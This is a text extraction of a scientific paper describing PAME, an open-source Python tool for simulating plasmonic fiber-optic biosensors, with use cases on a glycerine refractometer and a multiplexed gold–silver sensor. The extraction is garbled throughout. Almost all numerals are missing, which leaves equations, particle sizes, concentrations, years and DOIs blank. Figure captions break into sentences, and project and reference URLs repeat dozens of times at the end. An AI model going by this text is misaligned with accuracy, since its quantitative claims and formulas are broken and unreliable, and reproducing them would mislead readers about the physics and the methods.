dispersion models, including the cauchy, drude and sellmeier relations, as well as two freely-available refractive index catalogs: sopra ( ) materials are supplied as is with no guarantee of accuracy: use at your own discretion. and refractiveindex.info (polyanskiy, ), comprising over , refractive index files. pame includes a materials adapter to browse and upload materials as shown in fig. . selected materials are automatically converted, interpolated, and expressed in the working spectral unit (nm, ev, cm, . . . ) and range. pame’s plots respond to changes in material parameters in real time. composite materials a composite consists of two materials bound by a mixing function. for example, a gold-silver alloy could be modeled as bulk gold and silver, mixed through an effective mixing theory (emt). the complexity of the emt is related to the electromagnetic interactions between the materials. for example, for binary liquid mixtures with refractive indicies, n ,n , and fill fraction, φ, the composite can be approximated as nmixed = n φ + n ( − φ), with more complex liquid mixing models like weiner’s relation and heller’s relation yielding negligible differences (bhatia, tripathi & dubey, ). for solid inclusions, the extension of the maxwell–garnett (mg) mixing rule (garnett, ) by garcıa, llopis & paje ( ) has been shown effective, even when the particles are non-spherical and anisotropically clustered (li et al., ). at present, pame includes mg, with and without garcia’s extension, the bruggeman equation (bruggeman, ), the quasi-crystalline approximation with coherent potential (liu et al., ; tsang, kong & shin, ), and various binary liquid mixing rules. these are hardly exhaustive, and new methods are continually appearing (amendola & meneghetti, ; battie et al., ; malasi, kalyanaraman & garcia, ). adding emts to pame is straightforward, and more will be added in upcoming releases. composite materials are not limited to bulk materials, but include combinations of composites and/or nanomaterials, for example gold and silver nanoparticles embedded in a glass matrix. however one must be aware of the limitations of implicit mixing models. for example, consider a layer of gold nanoparticles. as coverage increases, particle–particle interactions are taken into account in garcia’s emt through the parameter k. emts describing inclusions of two or more material types have been described (zhdanov, ; bossa et al., ), and will be available in future versions. pame’s geometric fill models are also implemented as composite material classes. for example, small spheres of material x binding to the surface of a larger sphere of material y serves as a useful model for proteins binding to gold nanoparticles (lopatynskyi et al., ). an ensemble of spherical hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure screenshot of pame’s material adapter. (a) tree view of available bulk material models, files and bundled catalogues. (b) preview of the selected material includes available material metadata, notes and an interpolated fit to the current spectral range and unit system. currently showing ẽ for gold from johnson & christy ( ). (c) search utility to find and batch upload materials. inclusions on a disk is the correct geometry for modeling gold nanoparticles adhered to the cleaved end of a fiber surface. pame’s fill models track the number of inclusions, fill fraction, and other quantitative parameters at any given time. this enables macroscopic quantities like sensor sensitivity to be measured against microscopic parameters like the number of proteins bound to the nanoparticles. nanomaterials in pame, nanomaterials are treated as a special instance of a composite material whose a layer of nanoparticles is always embedded in some other media, for example in a slab of water or a sol–gel matrix of glass. therefore, in an object- oriented framework, a nanomaterial is a subclass of a composite material, with additional attributes like particle size and implicit optical properties. properties depend on a core material, a medium material, possibly an intermediate shell material, and particle size. a key distinction between nanomaterials and their bulk counterparts is that the optical properties of nanoparticles are highly sensitive to both the particle size and the permitivity of the surrounding medium. the implicit optical properties of spheroidal nanoparticles, such a extinction cross section, σext, are solved analytically through mie theory (bohren, ; jain et al., ). this is a fundamentally important quantity, as the position and shift in the extinction cross section maximum, hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure theoretical optical absorption and scattering properties of gold and silver nanoparticles. ex- tinction, absorption and scattering cross sections of (a) nm silver and (b) nm gold nanoparticles computed in pame using reported permittivities from hagemann, gudat & kunz ( ) and gao, lemarchand & lequime ( ), respectively, which produced more accurate cross sections than the typically-used drude model. known as the localized plasmon resonance (willets & van duyne, ; anker et al., ), is often the best indicator of the state of the nanoparticles comprising the system. while the full solution to the extinction cross section is described by the sum of an infinite series of ricatti–bessel functions, described in full in lopatynskyi et al. ( ), for brevity consider the approximate expression (jeong et al., ; van de hulst, ): σext ≈ π λ r im  m − m +     ≈σscatt − π λ r  m − m +     ≈σabs , ( ) where m is the ratio of the refractive index of the core particle material to that of the suspension medium (e.g., gold to water). the polynomial dependence of r, λ and m demonstrate the high variability in the optical properties of nanoparticles, and by extension, the biosensors that utilize them. typical cross sections from silver and gold nanospheres are depicted in fig. . while optical constants derived from mie theory are computed analytically, it is important to recognize that in a dielectric slab, nanomaterials are represented by an effective dielectric function; thus, optical constants like transmittance or reflectance will be computed using an effective dielectric function representing the nanoparticle layer. pame currently supports nanospheres and nanospheres with shells; planned support for exotic particle morphologies is described in the future improvements section. similar treatments of nanoparticle layers with effective media approximations have been successful (li et al., ; liu et al., ), even for non-spherical particles, and for ensembles of different sized particles (battie et al., ). this is a salient difference between pame, and numerical approaches like the boundary element method(bem), discrete dipole approximation(dda) and finite-difference time-domain(fdtd): pame relies on mixing theories, and hence is constrained by any underlying assumptions of the mixing model. for hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure pame’s simulation interface, showing the selection, notes/io and storage tabs. a more in-depth discussion on nanoparticle modeling, see myroshnychenko et al. ( ) and trügler ( ). simulation and data analysis pame’s interactivity makes it ideal for exploring the relationships between system variables, while the simulation environment provides the means to systematically increment a parameter and record the correspond response; for example, incrementing the fill fraction of inclusions in a nanoparticle shell to simulate protein binding, or incrementing the refractive index of the solvent to simulate a refractometer. because most updates in pame are automatically triggered, simulations amount to incrementing parameters in a loop and storing and plotting the results. pame’s simulation interface simplifies the process of setting simulation variables and storing results. it is comprised of three tabs: a selection tab (fig. ) for setting simulation parameters and value ranges. variable names like layer .d refers to the thickness of the first layer in the multilayer stack, and material .shell thickness is the size of the nanoparticle shell in nanometers of material . pame provides suggestions, documentation and a tree viewer to choose simulation variables, and alerts users to errant inputs, or invalid ranges; for example, if users try to simulate a volume fraction beyond its valid range of . to . . the notes/io tab provides a place to record notes on the simulation, and configure the output directory. pame can store all of its state variables in every cycle of the simulation, including the entire multilayer structure, and all computed optical quantities, but this can lead to storing large quantities of redundant data. the storage tab lets users pick and choose their storage preference, and even specify the quantities that should be regarded as “primary” for easy access when parsing. pame provides a simparser object to interact with saved simulations, which while not required, is intended to be used inside an ipython notebook (perez & granger, ) environment. the simparser stores primary results in pandas (mckinney & millman, ) and scikit-spectra (hughes & liu, ) objects for easy interaction and visualization, and the remaining results are stored in json. this allows for immediate analysis of the most important simulation results, with the remaining data easily accessed later through a tree viewer and other simparser utilities. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. examples of use case : refractometer plasmonic sensors respond to changes in their surrounding dielectric environments, and are commonly utilized as refractometers (mitsui, handa & kajikawa, ; punjabi & mukherji, ), even going so far as to measure the refractive index of a single fibroblast cell (lee et al., ). refractive index measurements can also be used to measure sensitivity and linear operating ranges. a common approach is to immerse the sensor in a medium such as water, and incrementally change the index of refraction of the medium by mixing in glycerine or sucrose. because the index of refraction as a function of glycerine concentration is well-known (glycerine producers’ association , ), sensor response can be expressed in refractive index units (riu). this is usually taken a step further in biosensor designs, where the rius are calibrated to underlying biophysical processes (e.g., protein absorption), either through modeling as pame does, or through orthogonal experimental techniques such as fourier transform infrared spectroscopy (tsai et al., ). this calibration process has been described previously (jeong & lee, ; richard & anna, ), and is usually carried through in commercial plasmonic sensors. this quantifies the analyte binding capacity of the sensor, an important parameter for assessing binding models , non-equilibrium sensing, and performing one-step measurements, for schasfoort et al. ( ) has enumerated seven interfering effects that lead to errant calculations of equilibrium affinity constants. estimations of nanoparticle and ligand density at the sensor surface provide insights as to whether or not some of these effects are likely occurring. example estimating the glucose levels in a blood sample. as a first use case, pame is used to calibrate sensor response to increasing concentrations of glycerine for an axial fiber comprised of a nm layer of gold nanoparticles. a dip sensor was constructed using a protocol and optical setup similar to that of mitsui, handa & kajikawa ( ). in brief, optical fiber probes were cleaved, submerged in boiling piranha ( : h so : h o ), functionalized with . % ( -aminopropyl) trimethoxysilane for min in anhydrous ethanol under sonication, dryed in an oven at ◦c, and coated with nm aunps to a coverage of about ± %, as verified by sem imaging (hughes et al., ). the fiber was submerged in ml of distilled water under constant stirring, and glycerine droplets were added incrementally until the final glycerine concentration was %, with each drop resulting in a stepwise increase in the reflectance as shown in figs. a and c). this system was simulated using the stack described in fig. , where the organosilanes were modeled as a nm-thick layer of a sellmeier material (eq. ( )), with coefficients: a = . ,a = . ,a = . ,b = . ,b = . ,b = . . these coefficients led to excellent agreement between experiment and simulation during the self-assembly process of the aunp film. figures c and d shows the strong agreement between measured and simulated response to increasing glycerine, and pame is able to show the reflectance spectrum free of the influence of the led light source in the dataset(b,a). it is clear that while the nanoparticle’s reflectance is prominent around λmax ≈ nm, the combination of both an increase in reflectance, and a blue-shift of spectral weight yield a nm peak in the normalized reflectance spectrum. neither is indicative of the free-solution plasmon resonance peak at λmax ≈ nm , and maintaining a correspondence between the reflectance centroid and plasmon resonance can lead to misinterpretation. furthermore, hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulated and measured spectral reflectance from a fiberoptic biosensor. increase in spectral reflectance (Γ) from a fiber dip sensor at % aunp coverage immersed in water glycerine mixture as glycerine fraction is increased from to % for the experiment (a) and simulation (b). the same response, normalized to the reflectance of the probe in water (Γo) prior to the addition of glycerine (c, d). the aunps layer reflects most strongly at λmax ≈ nm, yet the normalized reflectance peaks at λmax ≈ nm. the shape of this glycerine response profile is very sensitive to parameters like organosilane layer thickness and nanoparticle size and coverage, and by fitting to the simulated response, one may then estimate these parameters which are otherwise difficult to measure. this simple example provides valuable insights into the relationship between glycerine concentration and reflectance on a dip sensor. case : multiplexed ag–au sensor sciacca & monro ( ) recently published a multiplexed biosensor in which both gold and silver nanoparticles were deposited on the endface of a dip sensor and their reflectance was monitored simultaneously. in their experiment, the gold colloids were functionalized with anti-apoe, the antibody to an overexpressed gastric cancer biomarker, apoe. the silver colloids were functionalized with a non-specific antibody. the authors showed that the plasmon resonance peak of the gold particles shifted appreciably in response to apoe, while the silver did not. furthermore, the gold peak did not respond to clu, an underexpressed gastric cancer biomarker while the uncoated silver particles did, presumably due to non-specific binding. in effect, the multiplexed sensor provides a built-in negative control and can identify specific events more robustly. the ability to multiplex two or more colloids to a single sensor has great potential. to gain insights into hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure simulation of multiplexed biosensor response. simulation of a multiplexed biosensor with a combined nm gold and nm silver nanoparticle layer. simulated neutravidin binding to agnps (a, c) while aunps are kept bare, and vice versa (b, d). the coverage is varied until % of the available sites are occupied ( proteins per aunp, per agnp). the reflectance normalized to zero coverage (Γo) is shown in (c, d). this system, the sensor’s response to a mid-sized protein like neutravidin ( kda) was simulated . to our knowledge, this is the first attempt at modeling a multiplexed dip sensor the neutravidin simulation is an idealization of sciacca & monro ( )’s configuration, as it only considers a single protein layer rather than an antigen-antibody bilayer. containing two nanoparticle species. a dip sensor was configured in pame, composed of a . nm thick layer of organosi- lanes and a nm layer of mixed protein-coated nanoparticles in water. a -layer sciacca & monro ( ) actually used a thick layer of pah to bind the nanoparticles. it was unclear how best to model this material, so the organosilane layer from the previous example was used. the thickness of the pah layer might explain why sciacca & monro ( )’s silver reflectance is peaked at λmax ≈ nm; whereas, our simulation and other reported silver nanoparticle films (hutter & fendler, ) exhibit maxima at λmax ≈ nm. composite material model was used to represent the mixed nanoparticles. materials and were set to nm aunps and nm agnps, respectively, using the dielectric functions described in fig. ; material was set to water. au–au effects and ag–ag effects are taken into account, but pame’s -phase emts cannot account for au–ag effects ( -phase and n-phase emts (luo, ; zhdanov, ) will be implemented in upcoming releases). therefore, the combined layer, ñauag, is weighted in proportion to the fill fraction as, ñauag = φ ñau + φ ñag. nanoparticle coverage was chosen so as to produce a large reflectance, with approximately equal contributions from gold and silver; the actual coverage used in sciacca & monro ( ) is not stated. ultimately, . % of the surface sites were covered in gold, and . % in silver. neutravidin was modeled as a nm sphere (tsortos et al., ) of dispersive refractive index, n ≈ . (sarid & challener, ), filling a nm-wide shell on the nanoparticles from to % coverage ( proteins per aunp and per agnp), as shown in fig. . despite using several approximations, the simulation provides many insights into multiplexed sensors. first, the nm agnps reflect much more efficiently, despite agnps hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. and aunps having nearly identical extinction cross sections (fig. ). this is because silver particles are more efficient scatterers (lee & el-sayed, ), and reflectance depends exponentially on scattering cross section (quinten, ). therefore, reflectance sensors composed of highly-scattering particles can utilize sparse nanoparticle films, which are less susceptible to aggregation (scarpettini & bragas, ) and electrostatic and avidity effects. secondly, the normalized response to protein binding is about . units for silver, and . for gold; however, there are . more proteins on gold than silver. therefore, considering the response per molecule, nm silver spheres are . time more sensitive to protein binding than nm gold spheres. experiments have confirmed similar three-fold enhancement to protein-induced plasmon resonance shifts in aqueous solutions of aunps and agnps (sun & xia, ; mayer, hafner & antigen, ). this suggests a correspondence between shifts measured in free solution and the reflectance in optical fibers, despite little similarity in the qualitative profile of the response. nusz et al. ( ) has suggested a figure of merit to objectively compare shifts vs. intensity responses. finally, if response is partitioned into two spectral regions, such that nm < λ ≤ nm corresponds to silver, and λ ≥ nm to gold, then fig. illuminates an important result: despite a clear separation in the peaks of the reflectance spectra, the response to neutravidin spans both partitions. for example, in fig. c the gold region (λ ≥ nm) clearly responds to proteins binding to silver nanoparticles. this could lead to misinterpretations; for example, the response at λ ≈ nm could be misattributed to non-specific binding onto gold, when in fact there is only binding to silver. in sciacca & monro ( ), both the gold and silver spectral regions responded to apoe, when only gold is coated with anti-apoe. while the signal in the silver region could be due to non-specific interactions between the anti-apoe and agnps, these simulations show that it could simply be due to spectral overlap in the gold and silver response, the extent of which depends on the dielectric function of the protein, the au–ag coupling and other factors. implementation and performance pame’s graphical interface and event-handling framework is built on the enthought tool suite, especially traits and traitsui. traits is particularly useful for rapid application development (varoquaux, ). traitsui leverages either pyqt, pyside or wxpython on the backend to generate the graphical interface. some discrepancies in the user interface may be encountered between different backends, and possibly between operating systems. pame has been tested on ubuntu, osx and windows . a future refactor to supplant traitsui with enaml (nucleicdevelopmentteam, ) should resolve view inconsistencies. to enhance speed, pame utilizes numpy (oliphant, ) and pandas to vectorize most of its computations. complex structures such as multilayers of or more materials, with over a thousand datapoints per sample, are reasonably handled on a low-end laptop (inteltm core duo, gb ddr ram). the intended operating conditions for pame are stacks of less than layers, and dispersive media of or fewer datapoints. at present, the main performance bottleneck is redundant event triggering. because pame is highly interactive, changing a global parameter such as the working spectral range will trigger hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. updates in every material in the multilayer stack. for nanoparticles, this means the core, medium and possibly shell materials are all recomputed, each of which triggers a separate recalculation and redraw of the mie-scattering cross sections. streamlining global event handlers should yield appreciable performance gains, followed by additional vectorization of the tmm calculation, and finally implementing calculations that cannot be vectorized in cython (behnel et al., ). future improvements currently, pame’s nanoparticle support is limited to nanospheres and core–shell particles because analytical solutions to these systems exist, and because many effective medium approximations are implemented with spheres in mind. the electromagnetic properties of nanoparticles of arbitrary morphology can be solved with numerical methods such as dda, fdtd, or bem, and libraries like mnpbem implement common particle mor- phologies out-of-the-box. the recently released pygbe (cooper, bardhan & barba, ) library brings this potential to python. pygbe has been used to simulate protein interac- tions near the surface of materials (lin, liu & wang, ), meaning it has the potential to supplant the current geometrical fill models used to describe protein-nanoparticle interactions. by analyzing interactions in the near-field with pygbe and in the far-field with pame, comprehensive insights into nanoparticle systems may be obtained. even if exotic nanoparticle are incorporated into pame, they would still need to be homogenized through an effective mixing theory to fit the tmm multilayer model. while classical emts can account for non-spherical inclusions through a dipole polarizability parameter (garcıa, llopis & paje, ; quinten, ), modern two-material emts derived from spectral density theory (bergman, ; sancho-parramon, ; lans, ), n-material generalized tensor formulations (habashy & abubakar, ; zhdanov, ), and multipole treatments (malasi, kalyanaraman & garcia, ) give better descriptions of real films topologies, and will be incorporated into pame in the near future. some systems cannot be adequately described with emts, for example films composed of large, highly-scattering particles (quinten, ). in such cases, is still possible to compute the reflectance of a film of a few hundred spheres through generalized mie theory, which is a coherent superposition of the multipole moments of each particle, or for larger films using incoherent superposition methods (elias & elias, ; quinten, ), but such approaches don’t readily interface to the multilayer model. rigorous coupled-wave analysis (rcwa) may be a viable alternative, as it as it incorporates periodic dielectric structures (moharam et al., ) directly into tmm calculations, and is already imple- mented in python (rathgen, ; francis, ). rcwa could be integrated into pame without major refactoring, and has already been demonstrated as a viable alternative to emts in describing nanoparticle-embedded films in biosensors (wu & wang, ). conclusion plasmonic biosensing offers a promising alternative to conventional label-free protein detection techniques like enzyme-linked immunosorbent assays (elisa) and western blots, but dedicated software tools for the common sensor geometries are not readily hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. accessible. pame fills the gap by providing an open-source tool which combines aspects of thin-film design, effective medium theories, and nanoscience to provide a modeling environment for biosensing. in this work, it has been shown that pame can simulate a refractometer made from a dip sensor of aunps, and experimental data shows good agreement without invoking extensive fit parameters. furthermore, pame is flexible enough to reproduce results on new multiplexed sensor designs like those proposed by lin et al. ( ) and sciacca & monro ( ). as plasmonic biosensors continue to develop, pame should prove a useful tool for characterizing sensor response, a necessary step towards in-situ studies. about pame documentation, source code, examples and video tutorials are hosted at: https:// github.com/hugadams/pame. we are looking for developers to help extend the project. please contact if interested. programming language: python . license: -clause bsd version: . . dependencies: enthought tool suite, pandas, scipy (ipython ≥ . or greater and scikit-spectra recommended) os: windows, mac and linux persistent identifier: doi . /zenodo. binary installers: under development acknowledgements we’d like to thank robert kern and jonathan march for many helpful discussions on traits and traitsui, and rayhaan rasheed for helping to create the illustrations. additional information and declarations funding this work was supported in part by the george gamow research fellowship, luther rice collaborative research fellowship programs, the george washington university (gwu) knox fellowship and the gwu presidential merit fellowship. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: george gamow research fellowship. luther rice collaborative research fellowship. george washington university knox fellowship. gwu presidential merit fellowship. hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • adam hughes analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • zhaowen liu analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work. • mark e. reeves wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding the deposition of related data: source code is hosted on github: https://github.com/hugadams/pame pame v. . . is archived on zenodo doi . /zenodo. references amendola v, meneghetti m. . size evaluation of gold nanoparticles by uv—vis spectroscopy. journal of physical chemistry c : – doi . /jp . anker jn, hall wp, lyandres o, shah nc, zhao j, duyne rpv. . biosensing with plasmonic nanosensors. nature publishing group (june): – . attana. . immobilization of antibodies on the attana r⃝ carboxyl sensor chip surface. technical report. available at http://www.attana.com/wp-content/uploads/ / / tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf. barrow sj, wei x, baldauf js, funston am, mulvaney p. . the surface plasmon modes of self-assembled gold nanocrystals. nature communications : doi . /ncomms . battie y, resano-garcia a, chaoui n, en naciri a. . optical properties of plasmonic nanoparticles distributed in size determined from a modified maxwell–garnett-mie theory. physica status solidi (c) : – doi . /pssc. . behnel s, bradhaw r, dalcı́n l, florisson m, makarov v, seljebotn ds. . cython: c extensions for python. available at http://cython.org. bergman dj. . the dielectric constant of a composite material in classical physics. physics reports c ( ): – doi . / - ( ) - . bhatia sc, tripathi n, dubey gp. . refractive indices of binary liquid mixtures of (decane + benzene) and (hexadecdane + benzene, or +hexane) at . , . and . k. indian journal of chemistry a: – . bohren h. . absorption and scattering of light by small particles. hoboken: john wiley & sons, inc. bossa j, isokoski k, paardekooper dm, bonnin m, linden epvd, triemstra t, cazaux s. . porosity measurements of interstellar ice mixtures using optical laser interference and extended effective medium approximations. astronomy and astrophysics : – doi . / - / . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame https://github.com/hugadams/pame http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /jp http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf 